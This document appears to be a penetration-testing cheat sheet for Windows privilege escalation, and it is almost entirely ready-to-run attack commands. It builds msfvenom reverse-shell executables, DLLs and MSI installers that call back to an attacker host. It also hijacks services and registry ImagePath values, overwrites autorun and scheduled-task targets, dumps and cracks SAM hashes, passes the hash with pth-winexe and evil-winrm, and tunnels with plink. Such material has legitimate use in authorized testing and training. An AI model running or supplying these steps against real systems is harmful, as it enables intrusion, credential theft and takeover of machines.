# Windows Privilege Escalation

> Step by Step Windows Privilege Escalation Methodology.

## Enabling SMB1 for easy file transfers

Note: Machine will restart, so not recommended in real scenario

```
Enable-WindowsOptionalFeature -Online -FeatureName "SMB1Protocol-Client" -All
```

In Kali Machine:

```
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py ShareName SharePath
```

In Windows Machine:

```
copy \\kali-ip\\ShareName\filename .
```

## Spawning Admin Shells

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe -o reverse.exe
```

Listener on Kali:

```
nc -nlvp 4444
```

If RDP is available or (we can enable it), we can add our low privileged user to the administrators group, then spawn an administrator command prompt via GUI.

```
net localgroup administrators username /add
```

#### Admin to SYSTEM

Link: [PsExec](https://download.sysinternals.com/files/PSTools.zip)

```
PsExec.exe -accepteula -i -s C:\reverse.exe
```

## Privilege Escalation Tools

To get a powershell session in CMD

```
powershell -exec bypass
```

#### PowerUp

Script: [PowerUp.ps1](https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 "PowerUp Powershell Script")

```
. .\PowerUp.ps1
Invoke-AllChecks
```

#### SharpUp

Link: [SharUp Github](https://github.com/GhostPack/SharpUp)
PreCompiled Binary: [SharpUp.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe)

```
.\SharpUp.exe
```

#### Seatbelt

Link: [Seatbelt Github](https://github.com/GhostPack/Seatbelt)
PreCompiled Binary: [Seatbelt.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Seatbelt.exe)

```
.\Seatbelt.exe
```

#### winPEAS

Before running winPEAS
```
reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
```

Link: [WinPEAS Github](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS "Precompiled binaries are also there")

#### accesschk.exe

For checking user access control rights

```
.\accesschk.exe /accepteula -uwcqv user servicename
```

> To be continued

## Privilege Escalation Techniques

### Kernel Exploits

[Windows Exploit Suggester](https://github.com/bitsadmin/wesng)

Save the ouput of `systeminfo` into the file.txt

In Kali:
```
wes.py /home/file.txt -i 'Elevation of Privilege' --exploits-only | more
```

Pre-Compiled Kernel Exploit: <https://github.com/SecWiki/windows-kernel-exploits>

Quiet Efficient:

```
suggestme
```

### Service Exploits

**Service Commands**
- Query the configuration of a service
	```
	sc.exe qc ServiceName
	```

- Query the current status of a service

	```
	sc.exe query ServiceName
	```

- Modify a configuration option of a service

	```
	sc.exe config ServiceName option=value
	```

- Start/Stop a service

	```
	net start/stop ServiceName
	```
#### Service Misconfigurations

**Insecure Service Properties**

- Run winPEAS to enumerate service information

	```
	.\winPEASany.exe quiet servicesinfo
	```

- Confirm results of whichever specific service with accesschk.exe
	```
	.\accesschk.exe /accepteula -uwcqv user ServiceName
	```

- Query the service Configuration
	```
	sc qc ServiceName
	```

- Query the current status of service
	```
	sc query ServiceName
	```

- Set Service binary Path
	```
	sc config ServiceName binpath= "\"C:\reverse.exe\""
	```

- Start the listener and start the service

	```
	net start ServiceName
	```

**Unquoted Service Path**

- Run winPEAS to enumerate service information

	```
	.\winPEASany.exe quiet servicesinfo
	```

- Check that you can start/stop the service
	```
	.\accesschk.exe /accepteula -ucqv user ServiceName
	```

- Check for write permissions in the existing binary path to service
	```
	.\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted"
	```

- Copy the reverse.exe to unquoted path and binary name
	```
	copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
	```

- Start the listener and start the service

	```
	net start ServiceName
	```
- If Query type is "AUTOSTART" - Reboot the machine with following command:

	```
	shutdown /r /t 0
	```

**Weak Registry Permissions**

- Run winPEAS to enumerate service information

	```
	.\winPEASany.exe quiet servicesinfo
	```

- Verify Registry Permissions with Powershell
	```
	powershell -exec bypass
	Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
	```

- Accesschk.exe
	```
	.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
	```

- Check the current values in the service registry entry
	```
	reg query HKLM\System\CurrentControlSet\Services\regsvc
	```

- Overwrite the image path value in the services registry entry so that it points to our reverse shell
	```
	reg add HKLM\System\CurrentControlSet\Services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\reverse.exe /f
	```

- Start the listener and start the service

	```
	net start ServiceName
	```

**Insecure Service Executables**

- Run winPEAS to enumerate service information

	```
	.\winPEASany.exe quiet servicesinfo
	```

- Confirm that we can start/stop a service
	```
	.\accesschk.exe /accepteula -uvcq filepermsvc
	```

- Backup original service executable
	```
	copy C:\original.exe C:\Temp
	```

- Overwrite the original service executable with our reverse shell
	```
	copy /Y C:\reverse.exe C:\original.exe
	```

- - Start the listener and start the service

	```
	net start ServiceName
	```

**DLL Hijacking**

- Enumerate the winPEAS output for DLL hijacking
	```
	.\winPEASany.exe quiet servicesinfo
	```

- Enumerate which of the services for which we have start/stop ability
	```
	.\accesschk.exe /accepteula -uvqc dllsvc
	```

- Confirm the service
	```
	sc ec dllsvc
	```

- Use procmon to analyze and confirm that the service is in the C:\Temp PATH

- Generate a reverse shell with format set to DLL
	```
	msfvenom -p windows/x64/shell_reverse_tcp LHOST=X.X.X.X LPORT=4444 -f dll -o hijackme.dll
	```

- Copy payload into the C:\Temp folder

- Stop the service
	```
	net stop ServiceName
	```

- Start the listener and start the service

	```
	net start ServiceName
	```

### Registry Exploits

#### Autoruns

If you are able to write to an AutoRun executable, and are able to restart the system (or wait for it to be restarted) you may be able to escalate privledges.

- Enumerate using winPEAS
	```
	.\winPEASany.exe quiet applicationsinfo
	```

- Query the registry to get a list of AutoRun programs
	```
	reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
	```

- For each program run accesschk to verify the permissions on the executable
	```
	.\accesschk.exe /accepteula -wvu "C:\program.exe"
	```

- Make a backup of the original exe
	```
	copy "C:\program.exe" C:\Temp
	```

- Overwrite the executable with our reverse shell
	```
	copy /Y reverse.exe "C:\program.exe"
	```

- Set up a listener and restart the winows (or wait for a restart)

#### AlwaysInstallElevated

The "AlwaysInstallElevated" value must be set to 1 for both the local machine and the current user. (If either is missing the exploit will not work)
```
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
HKCM\SOFTWARE\Policies\Microsoft\Windows\Installer
```
- Run the winPEAS to check system credentials
	```
	.\winPEASany.exe quiet windowscreds
	```

- To verify manually query the registry for HKLM/HCLM keys
	```
	reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
	reg query HKCM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
	```

- Create a reverse shell with the MSI format
	```
	msfvenom -p windows/x64/shell_reverse_tcp LHOST=X.X.X.X LPORT=4444 -f msi -o reverse.msi
	```

- Start a listener on Kali

- Copy generated reverse shell 
	```
	copy \\192.168.1.1\\tools\reverse.msi .
	```

- Execute the file
	```
	msiexec /quiet /qn /i reverse.msi
	```

### Passwords

#### Registry

Search the registry for passwords with commands:

```
reg reg query HKLM /f password /t REG_SZ /s
reg query HKCM /f password /t REG_SZ /s
```

WinPEAS

- Run the winPEAS for files/user info
	```
	.\winPEASany.exe quiet filesinfo userinfo
	```

- Use winexe to spawn a shell
	```
	winexe -U 'admin%password' //192.168.1.1 cmd.exe
	```

 - For system shell
 	```
	winexe -U 'admin%password' --system //192.168.1.1 cmd.exe
 	```

#### SavedCreds

WinPEAS

- Run with creds check
	```
	.\winPEASany.exe quiet cmd windowscreds
	```

- Confirm manually by running
	```
	cmdkey /list
	```

- Start a listener

- use runas to execute reverse shell
	```
	runas /savecred /user:admin C:\reverse.exe
	```

#### Configuration Files

Commands to help search for passwords in config files

```
dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt
```

WinPEAS

- Run winPEAS to search for creds in files
	```
	.\winPEASany.exe quiet cmd searchfast filesinfo
	```

- Then use winexe to login with the password

#### SAM

The SAM and SYSTEM files are located in the `C:\Windows\System32\config` directory.

Backups may exist in the C:\Windows\Repair or `C:\Windows\System32\config\RegBack` directories.

**WinPEAS**

- Run winPEAS to search for creds in files
	```
	.\winPEASany.exe quiet cmd searchfast filesinfo
	```

- Copy SAM and SYSTEM files back to kali

- Get the latest pwdump called creddump to dump files
	```
	git clone https://github.com/CiscoCXSecurity/creddump7.git
	```

- Use creddump
	```
	python3 pwdump.py SYSTEM SAM
	```

- Try to crack the hash using hashcat (second half hash)
	```
	hashcat -m 1000 --force <hash> rockyou.txt
	```

#### Pass the hash

We can use a modified version of winexe, pth-winexe to spawn a command prompt using the admin users hash

- Obtain the admin Hash from SAM section

- Login with hash
	```
	pth-winexe -U 'admin%4F2DBC410D627862C8A0E7DCC7A41978' //192.168.1.1 cmd.exe
	```

#### Evil-WinRM
	
```
gem install evil-winrm
evil-winrm -i 192.168.1.1 -u admin -p password
evil-winrm -i 192.168.1.1 -u admin -H 4F2DBC410D627862C8A0E7DCC7A41978
```

### Schedules Tasks

List all scheduled tasks your user can see:
```
schtasks /query /fo LIST /v
```

Using Powershell:
```
Get-ScheduledTask | where { $_.TaskPath -notlike "\Microsoft*"} | ft TaskName, TaskPath, State
```

Enumeration:

- Use accesschk to check your permissions on the script
	```
	.\accesschk.exe /accepteula -quv user script.ps1
	```

- Backup the original file
	```
	copy script.ps1 C:\Temp
	```

- Start a listener

- Append the original File with a reverse shell
	```
	echo C:\reverse.exe >> script.ps1
	```

- Wait for scheduled task to complete

### Insecure GUI Apps (Citrix Method)

- Open the task

- Search tasklist for running tasks
	```
	tasklist /V | findstr task.exe
	```

- In the Navigation bar after File-> Open type:
	```
	C:\Windows\System32\cmd.exe
	```

### Startup Apps

- Run the Accesschk on the global startup programs directory
	```
	.\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
	```

Note: Startup apps in this file must be shortcuts

- vb Script that we can use to link/shortcut to our reverse.exe executable
	- `CreateShortcut.vbs`

	```
	Set oWS = WScript.CreateObject("WScript.Shell")
	sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.link"
	set oLink = oWS.CreateShortcut(sLinkFile)
	oLink.TargetPath = "C:\reverse.exe"
	oLink.save
	```

- Start the listener

- Run the command and wait for admin to login
	```
	cscript CreateShortcut.vbs
	```

### Installed Apps

1. Load Exploit-db.com and select filters
2. Filter Type(local), Platform (Windows), check the "Has App" box, in the search box type "priv esc"
	
	\* Most of these exploits rely on vulnerabilities that we have already covered above.
	
	\* Some may help with buffer overflows

3. Enumerate Apps
	```
	tasklist /V
	```

4. Use seatbelt to search for non-standard processes
	```
	.\seatbelt.exe NonstandardProcesses
	```

5. This can also be done with winPEAS
	```
	.\winPEASany.exe quiet procesinfo
	```

### Hot Potato

- Start a listener on Kali

- Copy potato exploit in the windows machine

- Run the command to execute
	```
	.\potato.exe -ip 192.168.1.1 -cmd "C:\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
	```

### Port Forwarding

[**plink.exe**](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)

- Copy the plink.exe to the windows machine

- enable the SSH with Root login
	```
	vim /etc/ssh/sshd_config
	```

- Restart the SSH service
	```
	service ssh restart
	```

- Run the plink in the windows shell
	```
	.\plink.exe root@kali-ip -R 445:127.0.0.1:445
	```

- Login and then modify the winexe command 
	```
	winexe -U 'admin%password' //127.0.0.1 cmd.exe
	```
